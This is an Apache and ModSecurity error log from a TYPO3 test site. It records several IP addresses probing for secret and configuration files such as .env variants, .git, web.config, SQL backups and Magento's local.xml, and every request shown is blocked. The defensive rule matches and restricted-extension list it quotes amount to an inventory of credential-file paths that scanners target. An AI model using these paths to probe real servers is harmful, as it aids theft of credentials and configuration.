[Wed Apr 02 08:48:18.629845 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-zdsves8FvEReXz3ciNIQAAAAk"]
[Wed Apr 02 08:48:18.630024 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-zdsves8FvEReXz3ciNIQAAAAk"]
[Wed Apr 02 08:48:18.792171 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-zdsves8FvEReXz3ciNJQAAAAk"]
[Wed Apr 02 08:48:18.792405 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-zdsves8FvEReXz3ciNJQAAAAk"]
[Wed Apr 02 08:48:18.792582 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-zdsves8FvEReXz3ciNJQAAAAk"]
[Wed Apr 02 08:48:18.818802 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Wed Apr 02 08:48:19.416603 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-zds_es8FvEReXz3ciNKwAAAAk"]
[Wed Apr 02 08:48:19.416845 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-zds_es8FvEReXz3ciNKwAAAAk"]
[Wed Apr 02 08:48:19.417019 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z-zds_es8FvEReXz3ciNKwAAAAk"]
[Wed Apr 02 08:48:19.443396 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-zds_es8FvEReXz3ciNLAAAAAk"]
[Wed Apr 02 08:48:19.443631 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-zds_es8FvEReXz3ciNLAAAAAk"]
[Wed Apr 02 08:48:19.443814 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Z-zds_es8FvEReXz3ciNLAAAAAk"]
[Wed Apr 02 08:48:19.470267 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-zds_es8FvEReXz3ciNLQAAAAk"]
[Wed Apr 02 08:48:19.470498 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-zds_es8FvEReXz3ciNLQAAAAk"]
[Wed Apr 02 08:48:19.470661 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Z-zds_es8FvEReXz3ciNLQAAAAk"]
[Wed Apr 02 08:48:19.497232 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Wed Apr 02 08:48:19.523546 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Wed Apr 02 08:48:19.915584 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Apr 02 08:48:19.942203 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-zds_es8FvEReXz3ciNMwAAAAk"]
[Wed Apr 02 08:48:19.942386 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-zds_es8FvEReXz3ciNMwAAAAk"]
[Wed Apr 02 08:48:19.942621 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-zds_es8FvEReXz3ciNMwAAAAk"]
[Wed Apr 02 08:48:19.942780 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-zds_es8FvEReXz3ciNMwAAAAk"]
[Wed Apr 02 08:48:19.968829 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Wed Apr 02 08:48:20.126942 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/CHANGELOG.txt
[Wed Apr 02 08:48:20.159992 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-zdtPes8FvEReXz3ciNOQAAAAk"]
[Wed Apr 02 08:48:20.160258 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-zdtPes8FvEReXz3ciNOQAAAAk"]
[Wed Apr 02 08:48:20.160449 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-zdtPes8FvEReXz3ciNOQAAAAk"]
[Wed Apr 02 08:48:20.244105 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Wed Apr 02 08:48:20.273232 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Wed Apr 02 08:48:20.300841 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.wp-config.php.swp
[Wed Apr 02 08:48:20.383336 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Wed Apr 02 08:48:20.504190 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.php~
[Wed Apr 02 08:48:20.574072 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-zdtPes8FvEReXz3ciNRAAAAAk"]
[Wed Apr 02 08:48:20.574322 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-zdtPes8FvEReXz3ciNRAAAAAk"]
[Wed Apr 02 08:48:20.574471 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-zdtPes8FvEReXz3ciNRAAAAAk"]
[Wed Apr 02 08:48:20.601030 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/yarn.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /yarn.lock found within REQUEST_FILENAME: /yarn.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-zdtPes8FvEReXz3ciNRQAAAAk"]
[Wed Apr 02 08:48:20.601259 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-zdtPes8FvEReXz3ciNRQAAAAk"]
[Wed Apr 02 08:48:20.601424 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-zdtPes8FvEReXz3ciNRQAAAAk"]
[Wed Apr 02 08:48:20.928181 2025] [:error] [pid 2190215] [client 154.83.103.10:30428] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-zdtIXG9q9bj4Y0L9vBkgAAAAM"]
[Wed Apr 02 08:48:20.928415 2025] [:error] [pid 2190215] [client 154.83.103.10:30428] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-zdtIXG9q9bj4Y0L9vBkgAAAAM"]
[Wed Apr 02 08:48:20.928581 2025] [:error] [pid 2190215] [client 154.83.103.10:30428] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-zdtIXG9q9bj4Y0L9vBkgAAAAM"]
[Wed Apr 02 08:48:20.959912 2025] [authz_core:error] [pid 2190215] [client 154.83.103.10:30428] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 08:48:20.986312 2025] [authz_core:error] [pid 2190215] [client 154.83.103.10:30428] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 08:48:21.016899 2025] [authz_core:error] [pid 2190215] [client 154.83.103.10:30428] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 08:48:21.043329 2025] [authz_core:error] [pid 2190215] [client 154.83.103.10:30428] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 08:48:21.069633 2025] [authz_core:error] [pid 2190215] [client 154.83.103.10:30428] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 08:48:21.280397 2025] [authz_core:error] [pid 2190215] [client 154.83.103.10:30428] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Wed Apr 02 08:48:21.306835 2025] [authz_core:error] [pid 2190215] [client 154.83.103.10:30428] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_backup.sql
[Sat Apr 05 11:40:28.059813 2025] [authz_core:error] [pid 2270269] [client 194.163.152.77:56564] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Apr 05 12:39:56.054031 2025] [authz_core:error] [pid 2278617] [client 93.123.109.7:33886] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Apr 06 01:47:53.907068 2025] [authz_core:error] [pid 2289268] [client 93.123.109.7:60992] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Apr 06 01:50:04.848612 2025] [authz_core:error] [pid 2289269] [client 93.123.109.7:33212] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Apr 06 07:31:41.232805 2025] [authz_core:error] [pid 2291643] [client 93.123.109.7:53746] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Apr 06 07:33:27.781119 2025] [authz_core:error] [pid 2292325] [client 93.123.109.7:53086] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Apr 07 22:09:23.658364 2025] [authz_core:error] [pid 2313198] [client 103.102.230.20:55136] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Apr 08 12:48:01.731717 2025] [:error] [pid 2340673] [client 54.251.16.55:39546] [client 54.251.16.55] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_T-4cgSUA0HSjO-1tl5DAAAAAo"]
[Tue Apr 08 12:48:01.732026 2025] [:error] [pid 2340673] [client 54.251.16.55:39546] [client 54.251.16.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_T-4cgSUA0HSjO-1tl5DAAAAAo"]
[Tue Apr 08 12:48:01.732212 2025] [:error] [pid 2340673] [client 54.251.16.55:39546] [client 54.251.16.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_T-4cgSUA0HSjO-1tl5DAAAAAo"]
[Tue Apr 08 19:51:39.375120 2025] [:error] [pid 2347174] [client 69.163.177.103:35748] [client 69.163.177.103] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_ViK2Wqok4rpUSPaF9IdwAAAAs"]
